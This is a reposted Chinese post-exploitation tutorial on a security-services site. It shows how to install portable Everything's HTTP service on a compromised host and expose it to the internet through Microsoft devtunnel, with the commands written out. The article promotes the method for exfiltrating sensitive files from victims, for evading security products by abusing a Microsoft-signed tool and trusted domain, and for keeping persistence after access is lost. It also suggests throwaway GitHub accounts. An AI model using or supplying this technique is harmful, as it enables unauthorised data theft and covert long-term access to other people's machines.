让后渗透中的Everything变得不再鸡肋_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

让后渗透中的Everything变得不再鸡肋

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


让后渗透中的Everything变得不再鸡肋

0x01 前言 我们在后渗透中,经常需要在拿下一台机器后,在一台机器建立据点,进行该台主机的敏感文件收集,例如配置文件,管理员放在桌面的密码本等等,或者说以这台机器为媒介,做一个在内网机器中,作为文件上传下载的机器,毕竟后渗透中,在内网中机器直接互相下载东西速度肯定是比从外面传进来更快,且隐秘性更好一些。此前会有师傅喜欢在拿下内网的机器中,用Everything起一个http服务器利用进行文件收集和互相下载文件等,但是这个姿势有个很大的缺点就是需要把端口转出来,或者需要自己在内网使用powershell的wget或者curl之类的命令进行文件下载,但是在安全设备监测严密的内网环境中,powershell通常会被禁用掉了,其他的下载姿势也不好多用,且根本不便携,最近想到了利用微软官方的 devtunnel开发隧道,直接将everyting起的端口转发出去,来让这一种后渗透中文件下载和搜索的姿势变的不再鸡肋,并且由于是微软官方的工具,天然具有免杀效果。 0x02 利用Everything起http服务搜索功能 这里有个坑点,一定要下载便携版的Everything,然后去设置,启用http服务器 应用保存即可 这时候会得到一个配置文件,将everything.ini,和便携版的everything一同上传到目标机器 然后安装 Client 服务 everything.exe -install-client-service 这样就在目标机器上开启了http服务,可以搜索、下载 0x03 利用devtunnel实现转发 可以去微软官网下载 这里需要登录绑定一下github账号,在实战中随便注册一个github就可以 devtunnel.exe user login -g -d 去绑定就好了 devtunnel.exe host -p 25005 https://xxxxxxx-xxxxxx.asse.devtunnels.ms/ 这时候成功将25005端口转发到了该地址,我们直接在互联网访问便可以实现文件搜索和下载了 0x04 总结 优点:微软签名, 微软可信域名 ,websocket协议 ,天然自带免杀效果。 最主要是的将Everything这种搜索文件神器,在后渗透中发挥的更好了,并且起到了权限维持作用,即使丢了权限,只要这个服务还在,还能照样下载目标机器文件。  缺点:需要登录,不过GitHub随便注册,倒是无所谓。 免责声明: 「由于传播、利用本公众号虫洞小窝所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!」

让后渗透中的Everything变得不再鸡肋